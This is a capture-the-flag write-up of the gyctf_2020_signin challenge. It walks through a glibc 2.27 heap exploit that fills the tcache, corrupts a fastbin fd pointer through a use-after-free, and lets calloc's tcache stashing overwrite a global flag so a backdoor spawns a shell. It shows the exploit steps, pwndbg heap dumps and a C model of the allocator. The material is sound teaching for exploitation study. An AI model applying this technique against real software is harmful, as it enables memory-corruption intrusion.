
CTF pwn: libc 2.27 pointer hijacking [gyctf_2020_signin]

libc 2.27 pointer hijacking: gyctf_2020_signin

add(0)
add(1)
add(2)
add(3)
add(4)
add(5)
add(6)
add(7)
delete(0)
delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)  # tcache already holds 7 entries, so this one goes to the fastbin
add(8)     # served from the tcache bin
edit(7, p64(0x4040c0 - 0x10))  # UAF: overwrite the freed fastbin chunk's fd
add(9)
io.sendlineafter(b'your choice?', b'6')  # option 6: the backdoor shown below

Let's look at why this works. (The first 0x250 chunk at 0xb80000 in the dumps below is the tcache_perthread_struct that glibc 2.27 allocates on the first malloc; the 0x80 chunks are ours.)

add(0)
add(1)
add(2)
add(3)
add(4)
add(5)
add(6)
add(7)
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)

Allocated chunk | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)

Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)
delete(0)
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00

Allocated chunk | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)

Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)

pwndbg> bins
tcachebins
0x80 [  1]: 0xb80260 ◂— 0
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty
delete(1)
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80260

Allocated chunk | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)

Allocated chunk | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)

Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)

pwndbg> bins
tcachebins
0x80 [  2]: 0xb802e0 —▸ 0xb80260 ◂— 0
fastbins
empty
unsortedbin
empty
smallbins
empty
largebins
empty

We see that the fd of the first freed chunk is null, while the second freed chunk's fd points to the first one, and so on: tcache is a LIFO singly linked list, and in glibc 2.27 its `next` pointer holds the user-data address of the previous entry (chunk address + 0x10), which is why chunk 0xb802d0 shows fd = 0xb80260 rather than 0xb80250.

delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)  # tcache is full (7 entries): this chunk goes to the fastbin
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80260

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)
fd: 0xb802e0

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80360

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)
fd: 0xb803e0

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80460

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)
fd: 0xb804e0

Free chunk (fastbins) | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)
fd: 0x00

Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)

pwndbg> bins
tcachebins
0x80 [  7]: 0xb80560 —▸ 0xb804e0 —▸ 0xb80460 —▸ 0xb803e0 —▸ 0xb80360 —▸ 0xb802e0 —▸ 0xb80260 ◂— 0
fastbins
0x80: 0xb805d0 ◂— 0
unsortedbin
empty
smallbins
empty
largebins
empty
add(8)  # malloc checks tcache first, so the fastbin chunk is left alone
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80260

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)
fd: 0xb802e0

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80360

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)
fd: 0xb803e0

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80460

Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)

Free chunk (fastbins) | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)
fd: 0x00

Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)

pwndbg> bins
tcachebins
0x80 [  6]: 0xb804e0 —▸ 0xb80460 —▸ 0xb803e0 —▸ 0xb80360 —▸ 0xb802e0 —▸ 0xb80260 ◂— 0
fastbins
0x80: 0xb805d0 ◂— 0
unsortedbin
empty
smallbins
empty
largebins
empty

Now we use the UAF to hijack the pointer: chunk 7 is free (sitting in the fastbin) but edit() still writes into it, and the first qword of its user data is the fastbin fd.

edit(7, p64(0x4040c0 - 0x10))
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xb80000
Size: 0x250 (with flag bits: 0x251)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80250
Size: 0x80 (with flag bits: 0x81)
fd: 0x00

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb802d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80260

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80350
Size: 0x80 (with flag bits: 0x81)
fd: 0xb802e0

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb803d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80360

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb80450
Size: 0x80 (with flag bits: 0x81)
fd: 0xb803e0

Free chunk (tcachebins) | PREV_INUSE
Addr: 0xb804d0
Size: 0x80 (with flag bits: 0x81)
fd: 0xb80460

Allocated chunk | PREV_INUSE
Addr: 0xb80550
Size: 0x80 (with flag bits: 0x81)

Free chunk (fastbins) | PREV_INUSE
Addr: 0xb805d0
Size: 0x80 (with flag bits: 0x81)
fd: 0x4040b0

Top chunk | PREV_INUSE
Addr: 0xb80650
Size: 0x209b0 (with flag bits: 0x209b1)

pwndbg> bins
tcachebins
0x80 [  6]: 0xb804e0 —▸ 0xb80460 —▸ 0xb803e0 —▸ 0xb80360 —▸ 0xb802e0 —▸ 0xb80260 ◂— 0
fastbins
0x80: 0xb805d0 —▸ 0x4040b0 (stdin@@GLIBC_2.2.5) ◂— 0
unsortedbin
empty
smallbins
empty
largebins
empty

The decompiled backdoor:

void __noreturn backdoor()
{
  calloc(1uLL, 0x70uLL);
  if ( change_it )
    system("/bin/sh");
  exit(0);
}

In this glibc version calloc does not consult tcache, so it goes straight to _int_malloc and is served from the fastbin first. When calloc takes the fastbin head (chunk 7 at 0xb805d0), the tcache stash loop in _int_malloc moves the remaining fastbin entries into tcache while it has room: the fake chunk 0x4040b0 is put into tcache, and its tcache `next` pointer, the qword at 0x4040b0 + 0x10 = 0x4040c0, is overwritten with the address of the previous tcache head. That qword is `change_it`, which is exactly why the exploit chose 0x4040c0 - 0x10 as the fake chunk address; `change_it` becomes non-zero and the backdoor calls system("/bin/sh"). Two details make this work: only the chunk actually returned is size-checked (the fake chunk's bogus size field at 0x4040b8 is never validated by the stash loop), and glibc 2.27 does not mangle the `next` pointer (safe-linking only arrived in 2.32), so a raw address in fd is accepted as-is.
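The fd chaining shown after delete(1) and the calloc stash step explained above, replayed in a toy C model of the glibc 2.27 tcache and fastbin paths. This is an added example, not the writeup's script and not glibc source: the heap and the .bss page at 0x4040b0 are simulated arrays (`heap`, `bss_fake`), the tcache limit of 7 and the 0x80 chunk size are taken from the dumps above, and `change_it` is modelled as the qword at fake chunk + 0x10, as the exploit's choice of 0x4040c0 - 0x10 implies.

```c
/* Toy model of the glibc 2.27 tcache and fastbin paths behind this exploit.
 * Added example: not the writeup's script and not glibc source. Simulated
 * arrays stand in for the heap and for the fake chunk at 0x4040b0. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TCACHE_MAX 7      /* mp_.tcache_count in glibc 2.27 */
#define CHUNK_SIZE 0x80   /* chunk size for a 0x70-byte request */
#define NCHUNKS 8

/* In 2.27 the tcache `next` pointer and the fastbin `fd` share the first
 * user qword (chunk + 0x10): pwndbg lists the same chunk as 0x...60 in
 * tcachebins and 0x...50 in fastbins. */
typedef struct chunk {
    uint64_t prev_size;
    uint64_t size;                  /* size | PREV_INUSE */
    void *fd;                       /* user data starts here */
    uint8_t rest[CHUNK_SIZE - 0x18];
} chunk_t;

static chunk_t heap[NCHUNKS];       /* simulated heap: one 0x80 chunk per slot */
static chunk_t bss_fake;            /* stands in for the fake chunk at 0x4040b0 */
#define CHANGE_IT (bss_fake.fd)     /* the qword at 0x4040b0 + 0x10 = 0x4040c0 */

static void *tcache_head;           /* tcache->entries[idx] (user pointers) */
static unsigned tcache_count;       /* tcache->counts[idx] */
static chunk_t *fastbin_head;       /* fastbinsY[idx] (chunk pointers) */

static void *mem(chunk_t *c) { return &c->fd; }                              /* chunk2mem */
static chunk_t *chunk_of(void *p) { return (chunk_t *)((char *)p - 0x10); } /* mem2chunk */

static void tcache_put(chunk_t *c) {
    void **e = (void **)mem(c);     /* e->next */
    *e = tcache_head;               /* this write is what clobbers change_it */
    tcache_head = e;
    tcache_count++;
}

static void *tcache_get(void) {
    void **e = (void **)tcache_head;
    tcache_head = *e;
    tcache_count--;
    return e;
}

/* free(): tcache first; once it holds 7 entries the chunk goes to the fastbin. */
static void model_free(void *p) {
    chunk_t *c = chunk_of(p);
    if (tcache_count < TCACHE_MAX) { tcache_put(c); return; }
    c->fd = fastbin_head;           /* fastbin push, LIFO */
    fastbin_head = c;
}

/* _int_malloc fastbin path. Only `victim` is size-checked; the chunks the
 * stash loop moves into tcache are never validated. */
static void *int_malloc(void) {
    chunk_t *victim = fastbin_head;
    if (victim == NULL) return NULL;                    /* model covers this path only */
    if (victim->size != (CHUNK_SIZE | 1)) return NULL;  /* "malloc(): memory corruption (fast)" */
    fastbin_head = victim->fd;
    while (tcache_count < TCACHE_MAX && fastbin_head != NULL) {
        chunk_t *tc = fastbin_head;
        fastbin_head = tc->fd;      /* on the fake chunk this reads change_it (still 0) */
        tcache_put(tc);             /* and this writes the old tcache head into it */
    }
    return mem(victim);
}

static void *model_malloc(void) {   /* malloc(): tcache preferred */
    return tcache_count > 0 ? tcache_get() : int_malloc();
}
static void *model_calloc(void) {   /* calloc() in 2.27 skips tcache entirely */
    return int_malloc();
}

static void reset(void) {
    memset(heap, 0, sizeof heap);
    memset(&bss_fake, 0, sizeof bss_fake);
    tcache_head = NULL; tcache_count = 0; fastbin_head = NULL;
    for (int i = 0; i < NCHUNKS; i++) heap[i].size = CHUNK_SIZE | 1;
}

/* Replays the writeup's sequence; returns what backdoor()'s `if (change_it)` sees. */
static void *run_signin_sequence(void) {
    reset();                                                      /* add(0..7): the 8 heap slots */
    for (int i = 0; i < NCHUNKS; i++) model_free(mem(&heap[i])); /* delete(0..7) */
    (void)model_malloc();           /* add(8): served from tcache, fastbin untouched */
    heap[7].fd = &bss_fake;         /* edit(7, p64(0x4040c0 - 0x10)): UAF write into fastbin fd */
    (void)model_malloc();           /* add(9) */
    (void)model_calloc();           /* backdoor: calloc(1, 0x70) */
    return CHANGE_IT;
}

int main(void) {
    reset();
    model_free(mem(&heap[0]));
    model_free(mem(&heap[1]));
    printf("chunk1 fd = %p, chunk0 user data = %p\n", heap[1].fd, mem(&heap[0]));
    printf("change_it after the backdoor's calloc: %p\n", run_signin_sequence());
    return 0;
}
```

The model deliberately omits everything the exploit does not touch (top-chunk carving, unsorted/small bins, the size check on stashed chunks that later glibc versions still lack, and the pointer mangling that 2.32 adds), so the two writes that matter are the only ones in `tcache_put`: the old head lands in the fake chunk's user qword, which is `change_it`.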


http://www.mrgr.cn/news/64834.html
